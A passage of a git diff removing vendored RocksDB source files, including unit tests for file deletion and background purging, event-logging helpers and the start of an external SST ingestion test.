-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz0123456789"));
-
-  k.TrimAppend(36, q, 1);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz01234567890"));
-
-  k.TrimAppend(26, q, 1);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz0"));
-
-  // Size going up, memory allocation is triggered
-  k.TrimAppend(27, p, 26);
-  ASSERT_EQ(std::string(k.GetUserKey().data(), k.GetUserKey().size()),
-            std::string("abcdefghijklmnopqrstuvwxyz0"
-                        "abcdefghijklmnopqrstuvwxyz"));
-}
-
-TEST_F(FormatTest, UpdateInternalKey) {
-  std::string user_key("abcdefghijklmnopqrstuvwxyz");
-  uint64_t new_seq = 0x123456;
-  ValueType new_val_type = kTypeDeletion;
-
-  std::string ikey;
-  AppendInternalKey(&ikey, ParsedInternalKey(user_key, 100U, kTypeValue));
-  size_t ikey_size = ikey.size();
-  UpdateInternalKey(&ikey, new_seq, new_val_type);
-  ASSERT_EQ(ikey_size, ikey.size());
-
-  Slice in(ikey);
-  ParsedInternalKey decoded;
-  ASSERT_TRUE(ParseInternalKey(in, &decoded));
-  ASSERT_EQ(user_key, decoded.user_key.ToString());
-  ASSERT_EQ(new_seq, decoded.sequence);
-  ASSERT_EQ(new_val_type, decoded.type);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/deletefile_test.cc b/thirdparty/rocksdb/db/deletefile_test.cc
deleted file mode 100644
index 989c0c4..0000000
--- a/thirdparty/rocksdb/db/deletefile_test.cc
+++ /dev/null
@@ -1,509 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <stdlib.h>
-#include <map>
-#include <string>
-#include <vector>
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/transaction_log.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class DeleteFileTest : public testing::Test {
- public:
-  std::string dbname_;
-  Options options_;
-  DB* db_;
-  Env* env_;
-  int numlevels_;
-
-  DeleteFileTest() {
-    db_ = nullptr;
-    env_ = Env::Default();
-    options_.delete_obsolete_files_period_micros = 0;  // always do full purge
-    options_.enable_thread_tracking = true;
-    options_.write_buffer_size = 1024*1024*1000;
-    options_.target_file_size_base = 1024*1024*1000;
-    options_.max_bytes_for_level_base = 1024*1024*1000;
-    options_.WAL_ttl_seconds = 300; // Used to test log files
-    options_.WAL_size_limit_MB = 1024; // Used to test log files
-    dbname_ = test::TmpDir() + "/deletefile_test";
-    options_.wal_dir = dbname_ + "/wal_files";
-
-    // clean up all the files that might have been there before
-    std::vector<std::string> old_files;
-    env_->GetChildren(dbname_, &old_files);
-    for (auto file : old_files) {
-      env_->DeleteFile(dbname_ + "/" + file);
-    }
-    env_->GetChildren(options_.wal_dir, &old_files);
-    for (auto file : old_files) {
-      env_->DeleteFile(options_.wal_dir + "/" + file);
-    }
-
-    DestroyDB(dbname_, options_);
-    numlevels_ = 7;
-    EXPECT_OK(ReopenDB(true));
-  }
-
-  Status ReopenDB(bool create) {
-    delete db_;
-    if (create) {
-      DestroyDB(dbname_, options_);
-    }
-    db_ = nullptr;
-    options_.create_if_missing = create;
-    return DB::Open(options_, dbname_, &db_);
-  }
-
-  void CloseDB() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void AddKeys(int numkeys, int startkey = 0) {
-    WriteOptions options;
-    options.sync = false;
-    ReadOptions roptions;
-    for (int i = startkey; i < (numkeys + startkey) ; i++) {
-      std::string temp = ToString(i);
-      Slice key(temp);
-      Slice value(temp);
-      ASSERT_OK(db_->Put(options, key, value));
-    }
-  }
-
-  int numKeysInLevels(
-    std::vector<LiveFileMetaData> &metadata,
-    std::vector<int> *keysperlevel = nullptr) {
-
-    if (keysperlevel != nullptr) {
-      keysperlevel->resize(numlevels_);
-    }
-
-    int numKeys = 0;
-    for (size_t i = 0; i < metadata.size(); i++) {
-      int startkey = atoi(metadata[i].smallestkey.c_str());
-      int endkey = atoi(metadata[i].largestkey.c_str());
-      int numkeysinfile = (endkey - startkey + 1);
-      numKeys += numkeysinfile;
-      if (keysperlevel != nullptr) {
-        (*keysperlevel)[(int)metadata[i].level] += numkeysinfile;
-      }
-      fprintf(stderr, "level %d name %s smallest %s largest %s\n",
-              metadata[i].level, metadata[i].name.c_str(),
-              metadata[i].smallestkey.c_str(),
-              metadata[i].largestkey.c_str());
-    }
-    return numKeys;
-  }
-
-  void CreateTwoLevels() {
-    AddKeys(50000, 10000);
-    DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-    ASSERT_OK(dbi->TEST_FlushMemTable());
-    ASSERT_OK(dbi->TEST_WaitForFlushMemTable());
-    for (int i = 0; i < 2; ++i) {
-      ASSERT_OK(dbi->TEST_CompactRange(i, nullptr, nullptr));
-    }
-
-    AddKeys(50000, 10000);
-    ASSERT_OK(dbi->TEST_FlushMemTable());
-    ASSERT_OK(dbi->TEST_WaitForFlushMemTable());
-    ASSERT_OK(dbi->TEST_CompactRange(0, nullptr, nullptr));
-  }
-
-  void CheckFileTypeCounts(std::string& dir,
-                            int required_log,
-                            int required_sst,
-                            int required_manifest) {
-    std::vector<std::string> filenames;
-    env_->GetChildren(dir, &filenames);
-
-    int log_cnt = 0, sst_cnt = 0, manifest_cnt = 0;
-    for (auto file : filenames) {
-      uint64_t number;
-      FileType type;
-      if (ParseFileName(file, &number, &type)) {
-        log_cnt += (type == kLogFile);
-        sst_cnt += (type == kTableFile);
-        manifest_cnt += (type == kDescriptorFile);
-      }
-    }
-    ASSERT_EQ(required_log, log_cnt);
-    ASSERT_EQ(required_sst, sst_cnt);
-    ASSERT_EQ(required_manifest, manifest_cnt);
-  }
-
-  static void DoSleep(void* arg) {
-    auto test = reinterpret_cast<DeleteFileTest*>(arg);
-    test->env_->SleepForMicroseconds(2 * 1000 * 1000);
-  }
-
-  // An empty job to guard all jobs are processed
-  static void GuardFinish(void* arg) {
-    TEST_SYNC_POINT("DeleteFileTest::GuardFinish");
-  }
-};
-
-TEST_F(DeleteFileTest, AddKeysAndQueryLevels) {
-  CreateTwoLevels();
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-
-  std::string level1file = "";
-  int level1keycount = 0;
-  std::string level2file = "";
-  int level2keycount = 0;
-  int level1index = 0;
-  int level2index = 1;
-
-  ASSERT_EQ((int)metadata.size(), 2);
-  if (metadata[0].level == 2) {
-    level1index = 1;
-    level2index = 0;
-  }
-
-  level1file = metadata[level1index].name;
-  int startkey = atoi(metadata[level1index].smallestkey.c_str());
-  int endkey = atoi(metadata[level1index].largestkey.c_str());
-  level1keycount = (endkey - startkey + 1);
-  level2file = metadata[level2index].name;
-  startkey = atoi(metadata[level2index].smallestkey.c_str());
-  endkey = atoi(metadata[level2index].largestkey.c_str());
-  level2keycount = (endkey - startkey + 1);
-
-  // COntrolled setup. Levels 1 and 2 should both have 50K files.
-  // This is a little fragile as it depends on the current
-  // compaction heuristics.
-  ASSERT_EQ(level1keycount, 50000);
-  ASSERT_EQ(level2keycount, 50000);
-
-  Status status = db_->DeleteFile("0.sst");
-  ASSERT_TRUE(status.IsInvalidArgument());
-
-  // intermediate level files cannot be deleted.
-  status = db_->DeleteFile(level1file);
-  ASSERT_TRUE(status.IsInvalidArgument());
-
-  // Lowest level file deletion should succeed.
-  ASSERT_OK(db_->DeleteFile(level2file));
-
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, PurgeObsoleteFilesTest) {
-  CreateTwoLevels();
-  // there should be only one (empty) log file because CreateTwoLevels()
-  // flushes the memtables to disk
-  CheckFileTypeCounts(options_.wal_dir, 1, 0, 0);
-  // 2 ssts, 1 manifest
-  CheckFileTypeCounts(dbname_, 0, 2, 1);
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 1 sst after compaction
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  // this time, we keep an iterator alive
-  ReopenDB(true);
-  Iterator *itr = 0;
-  CreateTwoLevels();
-  itr = db_->NewIterator(ReadOptions());
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 3 sst after compaction with live iterator
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  delete itr;
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, BackgroundPurgeTest) {
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-
-  // We keep an iterator alive
-  Iterator* itr = 0;
-  CreateTwoLevels();
-  ReadOptions options;
-  options.background_purge_on_iterator_cleanup = true;
-  itr = db_->NewIterator(options);
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 3 sst after compaction with live iterator
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  test::SleepingBackgroundTask sleeping_task_before;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_before, Env::Priority::HIGH);
-  delete itr;
-  test::SleepingBackgroundTask sleeping_task_after;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_after, Env::Priority::HIGH);
-
-  // Make sure no purges are executed foreground
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  sleeping_task_before.WakeUp();
-  sleeping_task_before.WaitUntilDone();
-
-  // Make sure all background purges are executed
-  sleeping_task_after.WakeUp();
-  sleeping_task_after.WaitUntilDone();
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  CloseDB();
-}
-
-// This test is to reproduce a bug that read invalid ReadOption in iterator
-// cleanup function
-TEST_F(DeleteFileTest, BackgroundPurgeCopyOptions) {
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-
-  // We keep an iterator alive
-  Iterator* itr = 0;
-  CreateTwoLevels();
-  ReadOptions* options = new ReadOptions();
-  options->background_purge_on_iterator_cleanup = true;
-  itr = db_->NewIterator(*options);
-  // ReadOptions is deleted, but iterator cleanup function should not be
-  // affected
-  delete options;
-
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 3 sst after compaction with live iterator
-  CheckFileTypeCounts(dbname_, 0, 3, 1);
-  delete itr;
-
-  test::SleepingBackgroundTask sleeping_task_after;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_after, Env::Priority::HIGH);
-
-  // Make sure all background purges are executed
-  sleeping_task_after.WakeUp();
-  sleeping_task_after.WaitUntilDone();
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, BackgroundPurgeTestMultipleJobs) {
-  std::string first("0"), last("999999");
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  Slice first_slice(first), last_slice(last);
-
-  // We keep an iterator alive
-  CreateTwoLevels();
-  ReadOptions options;
-  options.background_purge_on_iterator_cleanup = true;
-  Iterator* itr1 = db_->NewIterator(options);
-  CreateTwoLevels();
-  Iterator* itr2 = db_->NewIterator(options);
-  db_->CompactRange(compact_options, &first_slice, &last_slice);
-  // 5 sst files after 2 compactions with 2 live iterators
-  CheckFileTypeCounts(dbname_, 0, 5, 1);
-
-  // ~DBImpl should wait until all BGWorkPurge are finished
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::~DBImpl:WaitJob", "DBImpl::BGWorkPurge"},
-       {"DeleteFileTest::GuardFinish",
-        "DeleteFileTest::BackgroundPurgeTestMultipleJobs:DBClose"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  delete itr1;
-  env_->Schedule(&DeleteFileTest::DoSleep, this, Env::Priority::HIGH);
-  delete itr2;
-  env_->Schedule(&DeleteFileTest::GuardFinish, nullptr, Env::Priority::HIGH);
-  CloseDB();
-
-  TEST_SYNC_POINT("DeleteFileTest::BackgroundPurgeTestMultipleJobs:DBClose");
-  // 1 sst after iterator deletion
-  CheckFileTypeCounts(dbname_, 0, 1, 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DeleteFileTest, DeleteFileWithIterator) {
-  CreateTwoLevels();
-  ReadOptions options;
-  Iterator* it = db_->NewIterator(options);
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-
-  std::string level2file = "";
-
-  ASSERT_EQ((int)metadata.size(), 2);
-  if (metadata[0].level == 1) {
-    level2file = metadata[1].name;
-  } else {
-    level2file = metadata[0].name;
-  }
-
-  Status status = db_->DeleteFile(level2file);
-  fprintf(stdout, "Deletion status %s: %s\n",
-          level2file.c_str(), status.ToString().c_str());
-  ASSERT_TRUE(status.ok());
-  it->SeekToFirst();
-  int numKeysIterated = 0;
-  while(it->Valid()) {
-    numKeysIterated++;
-    it->Next();
-  }
-  ASSERT_EQ(numKeysIterated, 50000);
-  delete it;
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, DeleteLogFiles) {
-  AddKeys(10, 0);
-  VectorLogPtr logfiles;
-  db_->GetSortedWalFiles(logfiles);
-  ASSERT_GT(logfiles.size(), 0UL);
-  // Take the last log file which is expected to be alive and try to delete it
-  // Should not succeed because live logs are not allowed to be deleted
-  std::unique_ptr<LogFile> alive_log = std::move(logfiles.back());
-  ASSERT_EQ(alive_log->Type(), kAliveLogFile);
-  ASSERT_OK(env_->FileExists(options_.wal_dir + "/" + alive_log->PathName()));
-  fprintf(stdout, "Deleting alive log file %s\n",
-          alive_log->PathName().c_str());
-  ASSERT_TRUE(!db_->DeleteFile(alive_log->PathName()).ok());
-  ASSERT_OK(env_->FileExists(options_.wal_dir + "/" + alive_log->PathName()));
-  logfiles.clear();
-
-  // Call Flush to bring about a new working log file and add more keys
-  // Call Flush again to flush out memtable and move alive log to archived log
-  // and try to delete the archived log file
-  FlushOptions fopts;
-  db_->Flush(fopts);
-  AddKeys(10, 0);
-  db_->Flush(fopts);
-  db_->GetSortedWalFiles(logfiles);
-  ASSERT_GT(logfiles.size(), 0UL);
-  std::unique_ptr<LogFile> archived_log = std::move(logfiles.front());
-  ASSERT_EQ(archived_log->Type(), kArchivedLogFile);
-  ASSERT_OK(
-      env_->FileExists(options_.wal_dir + "/" + archived_log->PathName()));
-  fprintf(stdout, "Deleting archived log file %s\n",
-          archived_log->PathName().c_str());
-  ASSERT_OK(db_->DeleteFile(archived_log->PathName()));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(options_.wal_dir + "/" +
-                                                 archived_log->PathName()));
-  CloseDB();
-}
-
-TEST_F(DeleteFileTest, DeleteNonDefaultColumnFamily) {
-  CloseDB();
-  DBOptions db_options;
-  db_options.create_if_missing = true;
-  db_options.create_missing_column_families = true;
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.emplace_back();
-  column_families.emplace_back("new_cf", ColumnFamilyOptions());
-
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  rocksdb::DB* db;
-  ASSERT_OK(DB::Open(db_options, dbname_, column_families, &handles, &db));
-
-  Random rnd(5);
-  for (int i = 0; i < 1000; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), handles[1], test::RandomKey(&rnd, 10),
-                      test::RandomKey(&rnd, 10)));
-  }
-  ASSERT_OK(db->Flush(FlushOptions(), handles[1]));
-  for (int i = 0; i < 1000; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), handles[1], test::RandomKey(&rnd, 10),
-                      test::RandomKey(&rnd, 10)));
-  }
-  ASSERT_OK(db->Flush(FlushOptions(), handles[1]));
-
-  std::vector<LiveFileMetaData> metadata;
-  db->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(2U, metadata.size());
-  ASSERT_EQ("new_cf", metadata[0].column_family_name);
-  ASSERT_EQ("new_cf", metadata[1].column_family_name);
-  auto old_file = metadata[0].smallest_seqno < metadata[1].smallest_seqno
-                      ? metadata[0].name
-                      : metadata[1].name;
-  auto new_file = metadata[0].smallest_seqno > metadata[1].smallest_seqno
-                      ? metadata[0].name
-                      : metadata[1].name;
-  ASSERT_TRUE(db->DeleteFile(new_file).IsInvalidArgument());
-  ASSERT_OK(db->DeleteFile(old_file));
-
-  {
-    std::unique_ptr<Iterator> itr(db->NewIterator(ReadOptions(), handles[1]));
-    int count = 0;
-    for (itr->SeekToFirst(); itr->Valid(); itr->Next()) {
-      ASSERT_OK(itr->status());
-      ++count;
-    }
-    ASSERT_EQ(count, 1000);
-  }
-
-  delete handles[0];
-  delete handles[1];
-  delete db;
-
-  ASSERT_OK(DB::Open(db_options, dbname_, column_families, &handles, &db));
-  {
-    std::unique_ptr<Iterator> itr(db->NewIterator(ReadOptions(), handles[1]));
-    int count = 0;
-    for (itr->SeekToFirst(); itr->Valid(); itr->Next()) {
-      ASSERT_OK(itr->status());
-      ++count;
-    }
-    ASSERT_EQ(count, 1000);
-  }
-
-  delete handles[0];
-  delete handles[1];
-  delete db;
-}
-
-} //namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as DBImpl::DeleteFile is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/event_helpers.cc b/thirdparty/rocksdb/db/event_helpers.cc
deleted file mode 100644
index 1b79acb..0000000
--- a/thirdparty/rocksdb/db/event_helpers.cc
+++ /dev/null
@@ -1,155 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/event_helpers.h"
-
-namespace rocksdb {
-
-namespace {
-template<class T>
-inline T SafeDivide(T a, T b) {
-  return b == 0 ? 0 : a / b;
-}
-}  // namespace
-
-void EventHelpers::AppendCurrentTime(JSONWriter* jwriter) {
-  *jwriter << "time_micros"
-           << std::chrono::duration_cast<std::chrono::microseconds>(
-                  std::chrono::system_clock::now().time_since_epoch()).count();
-}
-
-#ifndef ROCKSDB_LITE
-void EventHelpers::NotifyTableFileCreationStarted(
-    const std::vector<std::shared_ptr<EventListener>>& listeners,
-    const std::string& db_name, const std::string& cf_name,
-    const std::string& file_path, int job_id, TableFileCreationReason reason) {
-  TableFileCreationBriefInfo info;
-  info.db_name = db_name;
-  info.cf_name = cf_name;
-  info.file_path = file_path;
-  info.job_id = job_id;
-  info.reason = reason;
-  for (auto& listener : listeners) {
-    listener->OnTableFileCreationStarted(info);
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-void EventHelpers::NotifyOnBackgroundError(
-    const std::vector<std::shared_ptr<EventListener>>& listeners,
-    BackgroundErrorReason reason, Status* bg_error,
-    InstrumentedMutex* db_mutex) {
-#ifndef ROCKSDB_LITE
-  if (listeners.size() == 0U) {
-    return;
-  }
-  db_mutex->AssertHeld();
-  // release lock while notifying events
-  db_mutex->Unlock();
-  for (auto& listener : listeners) {
-    listener->OnBackgroundError(reason, bg_error);
-  }
-  db_mutex->Lock();
-#endif  // ROCKSDB_LITE
-}
-
-void EventHelpers::LogAndNotifyTableFileCreationFinished(
-    EventLogger* event_logger,
-    const std::vector<std::shared_ptr<EventListener>>& listeners,
-    const std::string& db_name, const std::string& cf_name,
-    const std::string& file_path, int job_id, const FileDescriptor& fd,
-    const TableProperties& table_properties, TableFileCreationReason reason,
-    const Status& s) {
-  if (s.ok() && event_logger) {
-    JSONWriter jwriter;
-    AppendCurrentTime(&jwriter);
-    jwriter << "cf_name" << cf_name << "job" << job_id << "event"
-            << "table_file_creation"
-            << "file_number" << fd.GetNumber() << "file_size"
-            << fd.GetFileSize();
-
-    // table_properties
-    {
-      jwriter << "table_properties";
-      jwriter.StartObject();
-
-      // basic properties:
-      jwriter << "data_size" << table_properties.data_size << "index_size"
-              << table_properties.index_size << "filter_size"
-              << table_properties.filter_size << "raw_key_size"
-              << table_properties.raw_key_size << "raw_average_key_size"
-              << SafeDivide(table_properties.raw_key_size,
-                            table_properties.num_entries)
-              << "raw_value_size" << table_properties.raw_value_size
-              << "raw_average_value_size"
-              << SafeDivide(table_properties.raw_value_size,
-                            table_properties.num_entries)
-              << "num_data_blocks" << table_properties.num_data_blocks
-              << "num_entries" << table_properties.num_entries
-              << "filter_policy_name" << table_properties.filter_policy_name;
-
-      // user collected properties
-      for (const auto& prop : table_properties.readable_properties) {
-        jwriter << prop.first << prop.second;
-      }
-      jwriter.EndObject();
-    }
-    jwriter.EndObject();
-
-    event_logger->Log(jwriter);
-  }
-
-#ifndef ROCKSDB_LITE
-  if (listeners.size() == 0) {
-    return;
-  }
-  TableFileCreationInfo info;
-  info.db_name = db_name;
-  info.cf_name = cf_name;
-  info.file_path = file_path;
-  info.file_size = fd.file_size;
-  info.job_id = job_id;
-  info.table_properties = table_properties;
-  info.reason = reason;
-  info.status = s;
-  for (auto& listener : listeners) {
-    listener->OnTableFileCreated(info);
-  }
-#endif  // !ROCKSDB_LITE
-}
-
-void EventHelpers::LogAndNotifyTableFileDeletion(
-    EventLogger* event_logger, int job_id,
-    uint64_t file_number, const std::string& file_path,
-    const Status& status, const std::string& dbname,
-    const std::vector<std::shared_ptr<EventListener>>& listeners) {
-
-  JSONWriter jwriter;
-  AppendCurrentTime(&jwriter);
-
-  jwriter << "job" << job_id
-          << "event" << "table_file_deletion"
-          << "file_number" << file_number;
-  if (!status.ok()) {
-    jwriter << "status" << status.ToString();
-  }
-
-  jwriter.EndObject();
-
-  event_logger->Log(jwriter);
-
-#ifndef ROCKSDB_LITE
-  TableFileDeletionInfo info;
-  info.db_name = dbname;
-  info.job_id = job_id;
-  info.file_path = file_path;
-  info.status = status;
-  for (auto& listener : listeners) {
-    listener->OnTableFileDeleted(info);
-  }
-#endif  // !ROCKSDB_LITE
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/event_helpers.h b/thirdparty/rocksdb/db/event_helpers.h
deleted file mode 100644
index 674e6c5..0000000
--- a/thirdparty/rocksdb/db/event_helpers.h
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/version_edit.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/table_properties.h"
-#include "util/event_logger.h"
-
-namespace rocksdb {
-
-class EventHelpers {
- public:
-  static void AppendCurrentTime(JSONWriter* json_writer);
-#ifndef ROCKSDB_LITE
-  static void NotifyTableFileCreationStarted(
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      const std::string& db_name, const std::string& cf_name,
-      const std::string& file_path, int job_id, TableFileCreationReason reason);
-#endif  // !ROCKSDB_LITE
-  static void NotifyOnBackgroundError(
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      BackgroundErrorReason reason, Status* bg_error,
-      InstrumentedMutex* db_mutex);
-  static void LogAndNotifyTableFileCreationFinished(
-      EventLogger* event_logger,
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      const std::string& db_name, const std::string& cf_name,
-      const std::string& file_path, int job_id, const FileDescriptor& fd,
-      const TableProperties& table_properties, TableFileCreationReason reason,
-      const Status& s);
-  static void LogAndNotifyTableFileDeletion(
-      EventLogger* event_logger, int job_id,
-      uint64_t file_number, const std::string& file_path,
-      const Status& status, const std::string& db_name,
-      const std::vector<std::shared_ptr<EventListener>>& listeners);
-
- private:
-  static void LogAndNotifyTableFileCreation(
-      EventLogger* event_logger,
-      const std::vector<std::shared_ptr<EventListener>>& listeners,
-      const FileDescriptor& fd, const TableFileCreationInfo& info);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/experimental.cc b/thirdparty/rocksdb/db/experimental.cc
deleted file mode 100644
index effe9d7..0000000
--- a/thirdparty/rocksdb/db/experimental.cc
+++ /dev/null
@@ -1,49 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/experimental.h"
-
-#include "db/db_impl.h"
-
-namespace rocksdb {
-namespace experimental {
-
-#ifndef ROCKSDB_LITE
-
-Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family,
-                           const Slice* begin, const Slice* end) {
-  if (db == nullptr) {
-    return Status::InvalidArgument("DB is empty");
-  }
-
-  return db->SuggestCompactRange(column_family, begin, end);
-}
-
-Status PromoteL0(DB* db, ColumnFamilyHandle* column_family, int target_level) {
-  if (db == nullptr) {
-    return Status::InvalidArgument("Didn't recognize DB object");
-  }
-  return db->PromoteL0(column_family, target_level);
-}
-
-#else  // ROCKSDB_LITE
-
-Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family,
-                           const Slice* begin, const Slice* end) {
-  return Status::NotSupported("Not supported in RocksDB LITE");
-}
-
-Status PromoteL0(DB* db, ColumnFamilyHandle* column_family, int target_level) {
-  return Status::NotSupported("Not supported in RocksDB LITE");
-}
-
-#endif  // ROCKSDB_LITE
-
-Status SuggestCompactRange(DB* db, const Slice* begin, const Slice* end) {
-  return SuggestCompactRange(db, db->DefaultColumnFamily(), begin, end);
-}
-
-}  // namespace experimental
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/external_sst_file_basic_test.cc b/thirdparty/rocksdb/db/external_sst_file_basic_test.cc
deleted file mode 100644
index 534e8a0..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_basic_test.cc
+++ /dev/null
@@ -1,617 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <functional>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/sst_file_writer.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-class ExternalSSTFileBasicTest : public DBTestBase {
- public:
-  ExternalSSTFileBasicTest() : DBTestBase("/external_sst_file_test") {
-    sst_files_dir_ = dbname_ + "/sst_files/";
-    DestroyAndRecreateExternalSSTFilesDir();
-  }
-
-  void DestroyAndRecreateExternalSSTFilesDir() {
-    test::DestroyDir(env_, sst_files_dir_);
-    env_->CreateDir(sst_files_dir_);
-  }
-
-  Status DeprecatedAddFile(const std::vector<std::string>& files,
-                           bool move_files = false,
-                           bool skip_snapshot_check = false) {
-    IngestExternalFileOptions opts;
-    opts.move_files = move_files;
-    opts.snapshot_consistency = !skip_snapshot_check;
-    opts.allow_global_seqno = false;
-    opts.allow_blocking_flush = false;
-    return db_->IngestExternalFile(files, opts);
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<int> keys,
-      const std::vector<ValueType>& value_types, int file_id,
-      std::map<std::string, std::string>* true_data) {
-    assert(value_types.size() == 1 || keys.size() == value_types.size());
-    std::string file_path = sst_files_dir_ + ToString(file_id);
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    Status s = sst_file_writer.Open(file_path);
-    if (!s.ok()) {
-      return s;
-    }
-    for (size_t i = 0; i < keys.size(); i++) {
-      std::string key = Key(keys[i]);
-      std::string value = Key(keys[i]) + ToString(file_id);
-      ValueType value_type =
-          (value_types.size() == 1 ? value_types[0] : value_types[i]);
-      switch (value_type) {
-        case ValueType::kTypeValue:
-          s = sst_file_writer.Put(key, value);
-          (*true_data)[key] = value;
-          break;
-        case ValueType::kTypeMerge:
-          s = sst_file_writer.Merge(key, value);
-          // we only use TestPutOperator in this test
-          (*true_data)[key] = value;
-          break;
-        case ValueType::kTypeDeletion:
-          s = sst_file_writer.Delete(key);
-          true_data->erase(key);
-          break;
-        default:
-          return Status::InvalidArgument("Value type is not supported");
-      }
-      if (!s.ok()) {
-        sst_file_writer.Finish();
-        return s;
-      }
-    }
-    s = sst_file_writer.Finish();
-
-    if (s.ok()) {
-      IngestExternalFileOptions ifo;
-      ifo.allow_global_seqno = true;
